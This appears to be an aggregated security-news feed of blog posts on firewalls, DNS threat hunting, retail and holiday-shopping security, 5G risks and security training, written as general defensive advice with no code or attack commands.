In corporate networks, the classic defence against malware and other external attacks is usually split-up between two solutions: a firewall and a traditional antivirus program. The firewall is similar to a gate that only allows authorised personnel into the network and the virus program is a guard capturing those who attempt to sneak in undetected.
Balancing act

The classic defence of using two solutions was put into place because neither solution alone could accurately protect the network. The two needed to work together in order to achieve maximum effect and coverage.

Traditional firewalls simply followed pre-determined web protocols and lacked the intelligence of next-generation firewalls. This means that the classic firewall lacked the ability to distinguish between different kinds of web traffic. The inability to distinguish between legitimate traffic and abnormal malicious traffic meant that firewalls either accepted or rejected all the traffic sent its way.
Enterprises needed a more robust form of security with newer, more complex, rules. This is why traditional antivirus programs were paired up with firewalls.

Antivirus software is reactive and while these programs can deal with a threat, they only do so once that threat has entered the network. Depending on the number of threats attacking simultaneously and the sophistication of the attack an antivirus program is not powerful enough to keep the network safe.

However, when paired with a firewall that prevents all traffic entering the network the antivirus has the chance to scan the traffic and identify it. The antivirus can distinguish between the good and the bad traffic and relay this information to the firewall so it can only let in the approved traffic. The system works but it is flawed. Time is wasted waiting for the antivirus to identify the traffic and inform the firewall, and if one of the two was to go down then the whole system crashes.

This kind of defence previously used to be enough, but as enterprise networks get more complex and as the types of external threats become more varied, having two separate solutions working together is just not sufficient.
Convergent Firewall – the impenetrable dome

The problem surrounding a two solution balancing act can be addressed by next-generation firewalls, and one in particular is the Convergent Firewall (CFW). The CFW intelligently recognises users who have permissions to prevent unauthorised attackers and malicious infiltrators from having access, and in some cases outright destroys the invader.

In order for CFW to be able to guarantee this comprehensive protection, an extensive amount of data and files are fed into the program in advance and broken down extensively. With the assistance of machine learning, the CFW is proof against all known malware and viruses, and can adapt to future threats. It can also distinguish between normal and abnormal behaviour from users within the network. This accurate analysis enables CFW to detect malware in real time using digital DNA and thereby prevent the majority of malicious attacks.

To understand why this strategy makes sense, it helps to think again about the approaching flu season. The CFW is less of a conventional doctor than a kind of super medicine that can scan people down to the molecular level. It does this in order to be able to judge exactly whether a disease is present, what symptoms are to be expected and how the disease can best be cured. It’s the perfect medicine for a network in the middle of the flu season.

The post Preventing Illness On Your Network With The Right Medicine. appeared first on IT Security Guru.

Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations

By Don Boxely, CEO and Co- Founder at DH2i, The decentralization of today’s enterprise is a recognized fact. The multitude of cloud benefits—cheap storage, pay-per-use pricing, disaster recovery (DR), and

The post Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations appeared first on The Cyber Security Place.

5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics

The internet has fueled growth opportunities for enterprises by allowing them to establish an online presence, communicate with customers, process transactions and provide support, among other benefits. But it’s a double-edged sword: A cyberattack that compromises these business advantages can easily result in significant losses of money, customers, credibility and reputation, and increases the risk of completely going out of business. That’s why it’s critical to have a cybersecurity strategy in place to protect your enterprise from attackers that exploit internet vulnerabilities.

How DNS Analytics Can Boost Your Defense

The Domain Name System (DNS) is one of the foundational components of the internet that malicious actors commonly exploit and use to deploy and control their attack framework. The internet relies on this system to translate names, known as Uniform Resource Locators (URLs), into numbers, known as Internet Protocol (IP) addresses. Giving each IP a unique identifier allows computers and devices to send and receive information across networks. However, DNS also opens the door for opportunistic cyberattackers to infiltrate networks and access sensitive information.

Here are five tips to help you uncover hidden cyberthreats and protect your enterprise with DNS analytics.

1. Think Like an Attacker to Defend Your Enterprise

To protect the key assets of your enterprise and allocate sufficient resources to defend them, you must understand why a threat actor would be interested in attacking your organization. Attacker motivations can vary depending on the industry and geography of your enterprise, but the typical drivers are political and ideological differences, fame and recognition, and the opportunity to make money.

When it comes to DNS, bad actors have a vast arsenal of weapons they can utilize. Some of the most common methods of attack to anticipate are distributed denial-of-service (DDoS) attacks, DNS data exfiltration, cache poisoning and fast fluxing. As enterprises increase their security spending, cyberattacks become more innovative and sophisticated, including novel ways to abuse the DNS protocol. Malware continues to be the preferred method of threat actors, and domain generation algorithms (DGAs) are still widely used, but even that method has evolved to avoid detection.

2. Make DNS Monitoring a Habit

Passive DNS data is important because it is unlikely that a new network connection doesn’t have an associated DNS lookup. It also means that if you collect DNS data correctly, you can see most of the network activity in your environment. A more interesting subject is what we can do with this data to create more local security insights. Even though it is not hard to bypass DNS lookup, such network connections are suspicious and easy to detect.

3. Understand Communication and Traffic Patterns

Attackers leverage the DNS protocol in various ways — some of which are way ahead of our detection tools — however, there are always anomalies that we can observe in the DNS request sent out by endpoints. DNS traffic patterns vary by enterprise, so understanding what the normal pattern for your organization is will enable you to spot pattern anomalies easily.

A robust, secure system should be able to detect exfiltration via DNS tunneling software, which is not as easy as it sounds due to their different communication patterns. DNS tunneling software communication is reliable and frequent, the flow is bidirectional, and it is typically long. On the other hand, DNS exfiltration communication is opportunistic and unexpected, and possibly unidirectional since attackers are looking for the right moment to sneak out valuable data.

4. Get the Right Tools in Place

When analyzing which tools are the best to protect your organization against attacks leveraging DNS, consider what assets you want to protect and the outcomes you would like your analysts to achieve. There are many tools that can be pieced together to create a solution depending on your goals, such as firewalls, traffic analyzers and intrusion detection systems (IDSs).

To enhance the day-to-day activities of your security operations center (SOC), enable your team to conduct comprehensive analysis on domain activity and assign an appropriate risk rating, your SOC analysts should take advantage of threat intelligence feeds. These feeds empower analysts to understand the tactics, techniques and procedures (TTPs) of attackers and provide them with a list of malicious domains to block or alert on their security system. When this information is correlated with internal enterprise information through a security information and event management (SIEM) platform, analysts have full visibility to detect or anticipate ongoing attacks.

5. Be Proactive and Go Threat Hunting

Technology is a very useful tool that allows us to automate processes and alerts us of suspicious activity within our networks — but it is not perfect. Threat hunting can complement and strengthen your defense strategy by proactively searching for indicators of compromise (IoC) that traditional detection tools might miss. To succeed at threat hunting, you must define a baseline within your environment and then define the anomalies that you are going to look for.

A standard method for threat hunting is searching for unusual and unknown DNS requests, which can catch intruders that have already infiltrated your system as well as would-be intruders. Some indicators of abnormal DNS requests tinclude the number of NXDOMAIN records received by an endpoint, the number of queries an endpoint sends out and new query patterns. If you identify a potential threat, an incident response (IR) team can help resolve and remediate the situation by analyzing the data.

Learn More

Every organization is unique, but by understanding the basics of DNS analytics, the common methods of attack and the tools available to security teams, you will be better prepared to protect your enterprise from hidden cyberthreats.

We invite you to attend a live webinar at 11 a.m. ET on Dec. 11 (and available on-demand thereafter) to learn even more about DNS threat hunting.

Register for the webinar

The post 5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics appeared first on Security Intelligence.

5 Recommendations to Improve Retail Cybersecurity This Holiday Season

This is the first installment in a two-part series about how retailers can help protect their enterprises this holiday season.

With the holiday season upon us, retailers have an opportunity to boost revenues before the end of the year. Any increase in profit at the expense of retail cybersecurity, however, can cost a company more in the long run, given the rising size and costs of data breaches and associated revenue and reputational loss. With extra web traffic and high order volumes coming in, the holiday shopping season can be a particularly perilous time for businesses seeking to safeguard customer information.

A Timely Cause for Retail Cybersecurity Concerns

Tis the season for retailers to buckle down on security, since data breaches typically peak just prior to and during the holiday shopping season. IBM X-Force Incident Response and Intelligence Services (IRIS)’s assessment of X-Force Interactive Security Incident data recorded between 2012 and 2017 revealed that 41 percent of all retail and consumer product breaches occurred between September and December, elevating the risk for enterprise network breaches during that time of year. More than two-thirds of all records in the consumer products sector were leaked, lost or stolen during these last four months of the year — that’s nearly 180 million records each year.

Don’t Reward the Naughty

A growing number of retailers now offer rewards programs to retain and nurture their customer bases. For shoppers to join these programs, most retailers ask for personally identifiable information (PII) such as name, address, phone number and email address. If ever compromised, an attacker can correlate this customer PII to payment data and use it to aggregate information to compromise the user’s identity.

In line with recent regulatory laws such as the General Data Protection Regulation (GDPR), retailers should collect the least possible amount of PII on customers, have a clear purpose for each data element, and make sure to always keep data encrypted and safeguarded, both in transit and at rest.

Phishing Is in Season

Attackers don’t wait for the holiday season to begin launching spam campaigns, which are often employed as the first stage of their overall fraud and attack campaigns. Analysis of X-Force spam honeypot data collected between 2015 and 2018 revealed a notable rise in the average volume of spam emails beginning in August, with September slightly lower and October ranking third.

Average Spam per Month

Figure 1: Total volume of spam emails recorded, 2015–2018 (Source: IBM X-Force)

Preventing and responding to data breaches leading up to and during the holiday shopping season has become imperative. It is incumbent on retail security professionals to perform due diligence during this time, and there are several ways to accomplish this goal.

Below are five holiday season tips for retailers to help make your enterprise a safer shopping environment. These techniques can help retailers identify impending data breaches and sidestep the costs associated with a major data breach.

While I’ve listed these tips in the order of what I generally consider to be top-of-mind for retailers, this list can be customized to serve your organization’s specific needs.

1. Mitigate the POS Malware Threat

After a popular big box retailer suffered a breach in 2013, public awareness around the vulnerability of point-of-sale (POS) systems grew exponentially. That breach was facilitated by malware that infected POS machines and helped threat actors access a large volume of credit card information to sell to other criminals on the dark web. This intrusion resulted in the theft of more than 110 million records.

Five years later, POS malware continues to plague retailers. According to IBM X-Force, 74 percent of publicly reported POS malware breaches in 2017 impacted the retail sector. X-Force IRIS has observed malicious actors using POS malware, such as FrameworkPOS and PoSeidon, to siphon credit card data from POS terminals. Web-based malware, which steals credit card data on the fly as online transactions are processed, is also gaining steam.

To help mitigate these risks, both in physical and virtual realms, retailers should take the following steps:

  • Use some form of malware detection on your entire network to include the network of POS systems.
  • Test the devices’ hardware and software (more to come on penetration testing in the second installment of this series) and keep devices up-to-date through regular patching.
  • Work with a supplier that will contractually adhere to both your regulatory standards and security requirements.
  • When using mobile POS, have controls in place to ensure the integrity of the hand-held device and the encryption of its communication channels with the server that processes and stores card data.
  • Ensure any mobile payment system is from a trusted provider that supplies regular updates, patches, and equipment upgrades to comply with advances in encryption requirements and evolving threats.

Cybercriminals also commonly steal credit card data through payment card skimmers. These physical devices are fitted into the mouth of card readers and work by copying track data from the credit card and storing it on a memory chip inside the skimming device. In addition to retail establishments, skimmers are often found in ATMs, restaurants and gas stations.

As a precaution, retailers should frequently search for devices on their POS terminals and swiping equipment. Attackers typically attach skimmers to the device by sliding them onto the scanners and collecting them later. To check for a skimmer, examine devices daily and pull on the scanner if anything appears different. If part of the device comes off, it may be a skimming device. Call your service provider and IT security team to report it before resuming activity with that terminal or device.

With security controls and practices becoming more efficient, threat actors have resorted to gluing card skimmers to machines. This makes it difficult to detach by simply pulling it off the affected device. Retailers should train employees in all locations to recognize the proper look and components of their POS terminals and swiping devices. Employees should also know how to report suspicious devices.

2. A Clean Network Is a Safe Network

Payment card data carries immediate monetary value to criminals, and there are many methods by which they aim to steal it.

One tactic IBM X-Force researchers have seen increasingly often is the injection of malicious code into legitimate e-commerce websites. By compromising websites where people shop online, attackers can send payment data submitted during customer checkout to their own infrastructure.

To help reduce the likelihood of becoming a feeding ground for criminals, online retailers should take the following steps:

  • Harden the security of underlying web servers.
  • Limit access to critical assets and properly manage the privileges of those that maintain them.
  • Ensure that web applications are secure, harden them against threats like SQL injections and other common attacks, and have them tested regularly.
  • Deploy a change monitoring and detection solution to spot unauthorized modifications to your e-commerce platform’s web hosting directories. If this is not feasible, schedule periodic, manual reviews of these assets.

Account takeover (ATO), which occurs when a threat actor gains unauthorized access to an online account that belongs to someone else, can also affect e-commerce customers. With access to shoppers’ accounts, fraudsters can wreak havoc by stealing stored payment data, making fraudulent purchases and rerouting existing orders to a different address, for example.

Unauthorized access requires the use of legitimate credentials, which criminals can attain through a variety of tactics. The most common methods include phishing, brute-forcing weak passwords and launching SQL injection attacks on the web application itself.

You can help mitigate these threats by practicing good network hygiene. Here are some useful tips retailers can apply today to lower the risk of user account compromises:

  • Employ the most recent patches for all hardware, internal and external software, network communication protocols, and database security protocols.
  • Sanitize user input to prevent injection attacks.
  • Prioritize patching for the threats most relevant to your organization. Look out for the most-exploited vulnerabilities and ensure that internet-facing servers and systems are up to date.
  • Always consult your local computer emergency response team (CERT), IBM X-Force Exchange and other threat intelligence sources to gather the latest news on vulnerabilities and mitigation techniques.
  • Enforce multifactor authentication (MFA) for employees.

3. Go to Your Separate Corners

Cybercriminals are always leveraging new ways to steal payment card data and correlate it with PII. Elevated volumes of web traffic during the holiday season provide attackers with even more targets and opportunities.

To help keep customer data safe, even in cases where criminals manage to infiltrate assets, security teams should keep PII, financial data and POS information separate by segmenting enterprise networks. By keeping this information separated and encrypted, attackers will find it much harder to correlate data on customers. While segmenting a network can be an intensive process, it’s a small price to pay to keep customer data safe.

In network segmentation, allow only one IP address per segment to communicate at a time to detect suspicious traffic. While an attacker may spoof his or her IP address, this control can allow defenders to find out about most intruders rather easily. Here are some other best practices to consider:

  • Conduct internal audits for segment crossover to ensure that segregated data sets do not get mixed over time and appear in other places on the network, which can help attackers with identity theft.
  • Deploy web application firewalls (WAFs) to help ensure that incoming traffic is filtered, monitored and blocked to and from web applications to mitigate threats such as cross-site scripting (XSS) and SQL injection.
  • As a secondary measure, a firewall should be implemented to effectively govern all traffic coming in and out of the network. Firewall configuration is a key element in its effectiveness and should be performed by a certified network technician.
  • Have administrative users log in with a lower privilege level before escalating their privileges to perform updates and maintenance.
  • Prevent sensitive users and systems from communicating with the internet.

4. Learn From History and Educate Users

Nearly every company has some kind of data protection training in place. To make employee training programs more effective, organizations must understand that training materials are sometimes clicked through at a rapid pace to complete them as quickly as possible in favor of getting back to work. So how can an organization effectively educate their users?

  • Plan for role-based training of all employees in the organization.
  • Train employees on both physical and digital security.
  • Conduct short training sessions and field-test them by asking for employee feedback.
  • Launch an internal phishing campaign: Send a spoofed email from a dummy account with official-sounding names, titles and subjects, and track the number of users who click on the links or attachments. Offer additional training according to the conclusions from the campaign.
  • Identify users who need remedial training and retest as needed.
  • Most importantly, provide all users with an easily accessible resource to report issues. Users should be able to contact IT security with any question or suspicion.

For education to be effective, it has to be repetitive and stay top-of-mind for users across the entire organization. Get management to support awareness campaigns and find opportunities to educate users. Having vigilant employees makes mitigating attacks during the holiday season that much more effective. Frequent email reminders, illustrative posters and communicating best practices during team meetings can demonstrate your organization’s commitment to secure day-to-day conduct. Giving users personalized attention can go a long way toward making the message resonate with them — for example, you might consider gifting a security-themed mug for the holiday season.

5. Use Network IP Whitelists and Blacklists

Whitelists are IP addresses or domains used specifically for allowing access, whereas blacklists are used to help prevent IP addresses or domains from entering a network. Whitelists and blacklists are useful for keeping unauthorized and authorized connections within or outside the network. Keeping these lists up-to-date demands some diligence, but they can be crucial to boosting network security.

Filtering IPs according to these lists is more suitable for enterprises that do not manage e-commerce activity, since e-commerce companies have to accept inbound requests from all over the world, especially during the holiday shopping season.

These lists are much easier to maintain for networks that do not face external customers because blacklists can be used on both inbound and outbound access to help block known malicious hosts from communicating or accessing the organization’s data and assets. Below are some basic tips for filtering hosts:

  • Blacklist any IP addresses known to be malicious. Constantly updated lists can be fed into security solutions directly from threat intelligence platforms.
  • Should a blacklisted IP address have legitimate reasons for communicating with the network, investigate, confirm and allow access via the whitelist.
  • Whitelists should include any internal company addresses.
  • Whitelists should exclude any websites that are not relevant for employees carrying out their daily tasks (e.g., social media, webmail, etc.).
  • It is imperative to verify these lists periodically to help ensure that all information is accurate.
  • Should any IP addresses on the whitelist become outdated, it should be promptly removed or moved to the blacklist.
  • Keeping allowed and banned IP addresses from becoming intermingled is a basic premise of effective whitelist/blacklist practices.

Stay Tuned for More Holiday Season Tips for Retailers

There is no such thing as unimportant data. Take every necessary precaution to help protect enterprise and customer data by implementing strong retail cybersecurity controls, educating users and following current best practices. Maintaining customer confidence in your ability to protect their PII can result in more business, increased customer loyalty and stronger organizational reputation.

Stay tuned for five more tips to help retailers stay secure this holiday season.

Read the latest IBM X-Force Research

The post 5 Recommendations to Improve Retail Cybersecurity This Holiday Season appeared first on Security Intelligence.

Who’s the Weakest Link in Your Supply Chain?

Nearly 60% of organizations have suffered data breaches resulting from a third party, as suppliers pose a growing risk to enterprise security. Do you know how many third parties your

The post Who’s the Weakest Link in Your Supply Chain? appeared first on The Cyber Security Place.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes; Professionally Evil Network Security and Professionally Evil Application Security.  The first will focus on network penetration testing and the second focuses on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.



Professionally Evil Insights

What is the challenge in embracing multi-factor authentication?

Only 20% of IBM mainframe customers are embracing multi-factor authentication to protect data and applications, according to findings from a new poll of 81 mainframe users conducted by Macro 4

The post What is the challenge in embracing multi-factor authentication? appeared first on The Cyber Security Place.

How to Prepare for the Coming 5G Security Threats

Over the next few years, the pace of business will accelerate exponentially. 5G will enable the future enterprise technologies everyone is predicting and waiting for: fleets of self-driving delivery trucks, virtual (VR) and augmented reality (AR), and a world of enterprise Internet of Things (IoT) deployments — systems that will define an era that the World Economic Forum termed the “Fourth Industrial Revolution.” But do we understand the 5G security threats to come?

5G will provide super-high data rates, better quality of service and very low latency through dense base station deployments. As a result, we’ll likely depend on 5G far more than we ever did previous communications systems. Factories, businesses and critical infrastructure will all rely on 5G data connectivity, and this technology will transform business models and network infrastructures.

However, it’s important to note that this increased dependency on communications networks will also entail a greater capacity for disaster should they be compromised.

What Are the Greatest 5G Security Threats?

In a paper titled “A Formal Analysis of 5G Authentication,” researchers from ETH Zurich, the University of Lorraine and the University of Dundee warned that 5G could usher in a new era of security threats. In a nutshell, they found that 5G presents new risks because:

  • It’s an immature and insufficiently tested set of technologies;
  • It enables the movement and access of vastly higher quantities of data, and thus broadens attack surfaces; and
  • We will depend on it more than 4G for mission-critical applications.

With the rapid growth and change expected to come, what we don’t know very well may hurt us.

Check the Research

Like 3G and 4G networks, the existing 5G standard employs something called the Authentication and Key Agreement (AKA), which is a system for enabling networks to trust each other. The researchers performed a comprehensive analysis of security issues in the 5G network and discovered that the 5G AKA has at least two major vulnerabilities. First, it enables one malicious user to move usage charges to another user. Second, it’s possible to find nearby phones, which enables tracking of other users.

The 5G standard should be updated as soon as possible to prevent threat actors from exploiting these flaws.

Consider the SOC

Meanwhile, the frontline experts — information security teams, IT security specialists, security operations center (SOC) leaders — should be concerned about 5G because of its unique properties. In the real world, 5G represents higher costs than 4G networks for new equipment, plus unknown costs of integrating 4G and 5G systems. That stresses budgets, and enterprise leaders could put pressure on IT teams to favor 5G rollouts and possibly skimp on addressing security issues in the 5G network — a line item already hard fought for in many organizations.

Also, the higher 5G data throughput interfaces a vastly larger attack surface with more mission-critical applications. There are more potential entry points, and the consequences of an attack are proportionally greater. Enabled by 5G, the number of IoT devices alone is expected to rise from 7 billion today to 21.5 billion by 2025, according to IoT Analytics. This will enlarge the attack surface for such devices to an unimaginable size, and the capacity for distributed denial-of-service (DDoS) attacks, cryptojacking and other compromises could increase exponentially.

How to Cultivate a 5G State of Mind

Although 5G is new and will usher in entirely new models for how things get done, it must be built on a solid foundation of network security. Many of the risks will lie in the scale and type of new 5G-enabled categories of infrastructure. IoT security is a known problem with known solutions. 5G will magnify whatever insecurity exists in processes, procedures and policies for IoT, and protections must scale up in proportion.

5G will enable entirely new services, and the costs for securing these services must be accounted for. 5G will be expensive, the new services will be expensive and the security to make it all happen will also be expensive. Don’t skimp on one area to pay for the other; deploy 5G securely or don’t deploy it at all.

Pressure to rush headlong into 5G deployments will come from every direction. But smart deployments will go slowly, building the foundation in advance of the new infrastructure with endpoint management solutions powered by artificial intelligence that can monitor the expanding attack surface as no human can do alone.

You’ll continue to hear about how much more secure 5G is than 4G. Don’t let the hype and excitement breed complacency. 5G is a brave new world for business, but also for threat actors. Although 5G represents a plethora of possibilities, we must build the future on a familiar foundation of secure networks and best practices. Improve existing networks first, and roll out individual 5G services over time and with care to make the best of the coming revolution.

The post How to Prepare for the Coming 5G Security Threats appeared first on Security Intelligence.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.



McAfee Blogs

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent?

How businesses are building firewalls is changing. We’re seeing a continued trend toward smaller firewall boundaries and micro-segmentation to support zero-trust strategies, although it can be very piecemeal. As businesses

The post Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent? appeared first on The Cyber Security Place.

What Are The Black Friday Security Threats And How Can Organisations Avoid Them?

As Black Friday approaches, what are the security threats and how can organisations and consumers avoid them? Black Friday, and the following Cyber Monday, represent that time of year when

The post What Are The Black Friday Security Threats And How Can Organisations Avoid Them? appeared first on The Cyber Security Place.

Nine In Ten SMBs Suffering Wi-Fi Issues

Mesh Wi-Fi could solve their problems, but many businesses don’t know what that is. If your Wi-Fi has prevented you from getting your job done on at least one occasion,

The post Nine In Ten SMBs Suffering Wi-Fi Issues appeared first on The Cyber Security Place.

Mirai Used as Payload in Hadoop YARN Vulnerability

A Mirai variant has been discovered targeting unpatched Linux servers, shifting the use of the malicious payload beyond the internet of things (IoT), according to new research from NETSCOUT ASERT.

The post Mirai Used as Payload in Hadoop YARN Vulnerability appeared first on The Cyber Security Place.

Access to Thousands of Breached Sites Found on Underground Market

By Vitali Kremez, Director of Reasearch at  Flashpoint, Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of

The post Access to Thousands of Breached Sites Found on Underground Market appeared first on The Cyber Security Place.

Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform

Last year, a cybersecurity manager at a bank near me brought in a user behavior analytics (UBA) solution based on a vendor’s pitch that UBA was the next generation of security analytics. The company had been using a security information and event management (SIEM) tool to monitor its systems and networks, but abandoned it in favor of UBA, which promised a simpler approach powered by artificial intelligence (AI).

